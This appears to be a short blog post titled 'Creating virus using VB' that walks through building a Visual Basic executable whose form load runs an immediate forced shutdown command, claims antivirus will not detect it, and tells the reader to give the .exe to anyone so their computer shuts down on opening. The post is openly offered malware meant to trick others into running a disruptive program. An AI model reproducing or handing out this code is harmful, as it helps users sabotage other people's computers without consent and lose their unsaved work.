CREATING VIRUS USING VB

just install VB on ur computer
and use this code for shutting down a computer
without any prompt
this exe which will be made will not be deducted by any antivirus
because it uses DOS command
to shutdown

first of all open VB
and now choose
standard exe
just double click form
and code window will open
now type under

Private Sub Form_Load()
Shell ("shutdown -s -t 00")
End Sub
__________________________________

save it
and go to file
make .exe
and now give to anyone
as soon as he open the application
computer shuts down

0 comments: